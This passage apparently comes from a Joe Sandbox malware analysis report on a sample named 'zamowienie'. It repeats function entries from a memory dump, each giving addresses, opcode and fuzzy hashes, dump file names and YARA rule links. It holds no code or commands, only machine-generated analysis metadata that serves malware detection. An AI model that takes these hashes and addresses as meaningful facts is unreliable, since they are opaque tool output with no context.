                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: bf496d29f5dd9683d5e01542448a015539189fbb1d63fef27a39bb4210f84c4f
                                                                                                                                              • Instruction ID: a8ba6483a9d09d9273ad72e20e14066c51ec3f6ab0beaa1155c45c1555a6d0a7
                                                                                                                                              • Opcode Fuzzy Hash: bf496d29f5dd9683d5e01542448a015539189fbb1d63fef27a39bb4210f84c4f
                                                                                                                                              • Instruction Fuzzy Hash: 0331E57E610A20DFDB02EF54D98039637A4FF54351F89486DDC44EB200E779DA478B98
                                                                                                                                              Function 34F2D530 Relevance: .1, Instructions: 85COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5ffa032897925abb16e440b61c6c9e7df686b27a7c967f24a0ff968b4ba9ccc8
                                                                                                                                              • Instruction ID: a8c73161f2c69c4d022ea36e54fdd80c5dbf8dd30a7961b5a0791de555a8d70b
                                                                                                                                              • Opcode Fuzzy Hash: 5ffa032897925abb16e440b61c6c9e7df686b27a7c967f24a0ff968b4ba9ccc8
                                                                                                                                              • Instruction Fuzzy Hash: 16210FB6511304DFE710DB248900B1B7BE8EF84658F4C4C2AA908EB290EA24DD438BA6
                                                                                                                                              Function 34F1F32A Relevance: .1, Instructions: 79COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                                                              • Instruction ID: fe22024771ac4b3d728663608284c61afddc38c033b254b69e1463b7fa1692e7
                                                                                                                                              • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                                                              • Instruction Fuzzy Hash: AB219FB2200700DFD719CF15C441B5ABBE9EF853A5F19856DE10ACB2A1EB71E802CBA4
                                                                                                                                              Function 34F29660 Relevance: .1, Instructions: 78COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d5df14bc717c8f137947e65656b1c8755ce6c3e7cdfba5eb088e4bb888b1b298
                                                                                                                                              • Instruction ID: 08dff407c2771d6b9b985c6fe34ec232e47435f88ac2c9c9b0bb7d2e8a5a96b9
                                                                                                                                              • Opcode Fuzzy Hash: d5df14bc717c8f137947e65656b1c8755ce6c3e7cdfba5eb088e4bb888b1b298
                                                                                                                                              • Instruction Fuzzy Hash: 3F212139311B04DFF7215B20D800F167BE5AF802A8F1C4E29E492579A0DB25EA838F95
                                                                                                                                              Function 34FCBC01 Relevance: .1, Instructions: 77COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9528d46e75778757b5b5794a13580a2a41c5edc6b4eef142d86ce7666900d737
                                                                                                                                              • Instruction ID: b638aed32e9b2f4326dc9c1706cd223f5f9f98d32cd74653c3466e2db2fec3a9
                                                                                                                                              • Opcode Fuzzy Hash: 9528d46e75778757b5b5794a13580a2a41c5edc6b4eef142d86ce7666900d737
                                                                                                                                              • Instruction Fuzzy Hash: EC21D37AA40216EFEB11CF45E884F4ABBB8EF45754F098825E814AB210DB34DD12CB91
                                                                                                                                              Function 34F971F9 Relevance: .1, Instructions: 74COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2fa004a31fa408f7fc385a47254a4e265f5f179228ed26913f8b9b19644b0c9f
                                                                                                                                              • Instruction ID: d82edf81b60347ebd35f95574f47f01b4837b0940df2e9b57fa7369a6b384cf1
                                                                                                                                              • Opcode Fuzzy Hash: 2fa004a31fa408f7fc385a47254a4e265f5f179228ed26913f8b9b19644b0c9f
                                                                                                                                              • Instruction Fuzzy Hash: 2721FF31A14741CFF318CF658840A9BB7E9EBC1654F1C4D6DF8A697150DB20E9878F92
                                                                                                                                              Function 34F6D0C0 Relevance: .1, Instructions: 73COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                                                                              • Instruction ID: 987681b8eb8ff3c630ab67eac2e40a6326f7797b4b7199f27be21dff83a588ba
                                                                                                                                              • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                                                                              • Instruction Fuzzy Hash: 0D21D472644704EBE311DF18DC41B4BBBA4FF88764F040A2EF945A73A0D774D8028BA9
                                                                                                                                              Function 34F115A9 Relevance: .1, Instructions: 69COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                                                                              • Instruction ID: c020e3cf23b303febcfce8823bd34651987193fc131b662563f7b9b885dd39c1
                                                                                                                                              • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                                                                              • Instruction Fuzzy Hash: C621D176A02685DFF3029B95CA44B1677E9EF44380F1D09E1EC05CB6A2EB24DC53D651
                                                                                                                                              Function 34EEB765 Relevance: .1, Instructions: 69COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0e50f49d92ae6fcc49f37898de65cccb625e941c69dd987615df1ee845b69b5f
                                                                                                                                              • Instruction ID: 67875677d9a617f7e817ae2561b320a6097b20484eb3c5dba999f825ca788e7a
                                                                                                                                              • Opcode Fuzzy Hash: 0e50f49d92ae6fcc49f37898de65cccb625e941c69dd987615df1ee845b69b5f
                                                                                                                                              • Instruction Fuzzy Hash: 3D212772122A00DFE722DF68D940B5AB7F5FF48709F198968E006966B1C734E992DF48
                                                                                                                                              Function 34FAD7B0 Relevance: .1, Instructions: 68COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c5acb5f3ba083c4099dfa29a6382a993b1cbc49009cdf177e412d1a340e2cc6a
                                                                                                                                              • Instruction ID: 44255bcedc85fbce3d86cb5a96eca361deb90420ff5801ed2a7789eeb3f762e0
                                                                                                                                              • Opcode Fuzzy Hash: c5acb5f3ba083c4099dfa29a6382a993b1cbc49009cdf177e412d1a340e2cc6a
                                                                                                                                              • Instruction Fuzzy Hash: 3D11D07B501624EBD7228F45CC40F6B7BBAEF81B60F4A4819F9188B260D724DC02DBE1
                                                                                                                                              Function 34EF3720 Relevance: .1, Instructions: 67COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6e3efd2dac736ab61b5ccf89f0452476f2a6a52df0c6bd7b94fbe4182f0530c9
                                                                                                                                              • Instruction ID: c9e91de1198ef051058de051c95855a3fc90d22ec12c723dcfd0a42aa5bab435
                                                                                                                                              • Opcode Fuzzy Hash: 6e3efd2dac736ab61b5ccf89f0452476f2a6a52df0c6bd7b94fbe4182f0530c9
                                                                                                                                              • Instruction Fuzzy Hash: 4E21D4B9A116098BF701CF69C8447EE77A4FF8871DF66802CD812672D0CBBA9985C794
                                                                                                                                              Function 34F8D5B0 Relevance: .1, Instructions: 66COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 227256db81d375ecfc13626cb2ab5827bd77baaff17ec571dfb7d10958618551
                                                                                                                                              • Instruction ID: 8f9182c3ecfeeb3dfa1ca53c10f3b574f3bb755d25924a4fe54fb5eaf43b26e7
                                                                                                                                              • Opcode Fuzzy Hash: 227256db81d375ecfc13626cb2ab5827bd77baaff17ec571dfb7d10958618551
                                                                                                                                              • Instruction Fuzzy Hash: 8C119076211704EFE712CB64CD40F4AB7B9EF84664F184C19E0499F680E774F942CA64
                                                                                                                                              Function 34F7D080 Relevance: .1, Instructions: 66COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: daa114370601fceccfe64b2fad3eb396bf7db3c7ea33f85a6d706b61b230a738
                                                                                                                                              • Instruction ID: 2fce9765aecb5fb8291c6e31461449dc6307f50ca948fcc88656dd9186cb56e3
                                                                                                                                              • Opcode Fuzzy Hash: daa114370601fceccfe64b2fad3eb396bf7db3c7ea33f85a6d706b61b230a738
                                                                                                                                              • Instruction Fuzzy Hash: CA110675150640DFE3229B24DC40F277BA9EFC16A4F5D8C2AF5049B691DA24DC83DBA4
                                                                                                                                              Function 34F7DDC0 Relevance: .1, Instructions: 66COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              • Opcode ID: de55015d3dc3618fe83074aaef23a60c7dfd4e404e75040d0edc325872ed45d4
                                                                                                                                              • Instruction ID: 2be0556da97246631fc9dbacb86c78146b9f6f91fbd274c98544956f28ad23bf
                                                                                                                                              • Opcode Fuzzy Hash: de55015d3dc3618fe83074aaef23a60c7dfd4e404e75040d0edc325872ed45d4
                                                                                                                                              • Instruction Fuzzy Hash: 1B219A71962701CFE706CF14D180648BBE1FF557AAB98C9AFD0069B6A0D7349883CF86
                                                                                                                                              Function 34F2BCA0 Relevance: .1, Instructions: 65COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: da000c682babd52bac794c2ac7876c5a8471e30d5c139c6463913b59d462f549
                                                                                                                                              • Instruction ID: 8b37a6bea39eb3d4cf8070a08a0be8fc39a02ab058efff7e2156424f98f695ff
                                                                                                                                              • Opcode Fuzzy Hash: da000c682babd52bac794c2ac7876c5a8471e30d5c139c6463913b59d462f549
                                                                                                                                              • Instruction Fuzzy Hash: 0611063A705689CFF3018F28C840B5577D9FF85394F0C0951EC518B391EE29DD12DAA1
                                                                                                                                              Function 34EE9240 Relevance: .1, Instructions: 64COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3103a8c165018c44d10cb12858dcbf977984917eaf94936e1a4f15b398c9f67b
                                                                                                                                              • Instruction ID: dcbf477dca9b8a708c5ba76b97f9f45533dc7ccc9f4b4cff705c79c6756425d0
                                                                                                                                              • Opcode Fuzzy Hash: 3103a8c165018c44d10cb12858dcbf977984917eaf94936e1a4f15b398c9f67b
                                                                                                                                              • Instruction Fuzzy Hash: 70112B7A131205EFE7118F51E801A7137E9EB98B85F584429D900EB361D734DD83CF98
                                                                                                                                              Function 34F8D660 Relevance: .1, Instructions: 63COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 84d8c099071c2c2e27e0d7cc270b2f1a9f3cfe9a568463a6261584609a9bdb37
                                                                                                                                              • Instruction ID: dd0b86851aa747050f294248c43c1ceed2a2ea1d9f7870ab095c90a7667f1f92
                                                                                                                                              • Opcode Fuzzy Hash: 84d8c099071c2c2e27e0d7cc270b2f1a9f3cfe9a568463a6261584609a9bdb37
                                                                                                                                              • Instruction Fuzzy Hash: CD11917B600608EFEB05DF64C540B9ABBF9EF89654F184C59D49A9B300E670E942CB50
                                                                                                                                              Function 34F7D250 Relevance: .1, Instructions: 60COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5370097aadcfcf4d97e86bf2871f0eeff9d9a8ddcd1179943b81b3d94c7629c6
                                                                                                                                              • Instruction ID: f47cb1ae3d07a081769a1150984dbd2ea984483f266f07549b7a1237855b7bda
                                                                                                                                              • Opcode Fuzzy Hash: 5370097aadcfcf4d97e86bf2871f0eeff9d9a8ddcd1179943b81b3d94c7629c6
                                                                                                                                              • Instruction Fuzzy Hash: 5E0126AB6502049BF71145A58C80BAB7B08DFC96F4FDD4D2ABF145B241DA2CCC83D6E1
                                                                                                                                              Function 34FBDDC6 Relevance: .1, Instructions: 58COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 191d967117b901f222999fb19dc0c0ade7251f1db6499103a1692eba7e8ace9d
                                                                                                                                              • Instruction ID: 0670bb972b59771dcdee1d64520327cbc4da7c5697de5f73cdbeb3703ab05517
                                                                                                                                              • Opcode Fuzzy Hash: 191d967117b901f222999fb19dc0c0ade7251f1db6499103a1692eba7e8ace9d
                                                                                                                                              • Instruction Fuzzy Hash: E601F9657001049BDF05861A8C406BA73CE9FD6221F9C8A39E5D4C7380DD34DC53C6A6
                                                                                                                                              Function 34FAD6F0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                                                                                                              • Instruction ID: 2b3661b5ad1d6a3a46bedbef3ac7e7b02351c8d93926680b59720ffb786e04cb
                                                                                                                                              • Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                                                                                                              • Instruction Fuzzy Hash: D9018276700209FFDB18CBA6D944CAF77BDEF84A54F040419A90083140E734EE02CB60
                                                                                                                                              Function 34F1B052 Relevance: .1, Instructions: 57COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3c9fbf9c4641612f5679a9a1dfeb168d750c6694a3894c4977e07f9e51517b6c
                                                                                                                                              • Instruction ID: 64de27e238c5bbea02e263b70e7b2828b357f007239edfd19a35083d6ffd9bca
                                                                                                                                              • Opcode Fuzzy Hash: 3c9fbf9c4641612f5679a9a1dfeb168d750c6694a3894c4977e07f9e51517b6c
                                                                                                                                              • Instruction Fuzzy Hash: 5101B976B00344EFF710DB6A9C84F6B77ECDF84754F080869E605D7241DA74E9038661
                                                                                                                                              Function 34EE7330 Relevance: .1, Instructions: 55COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
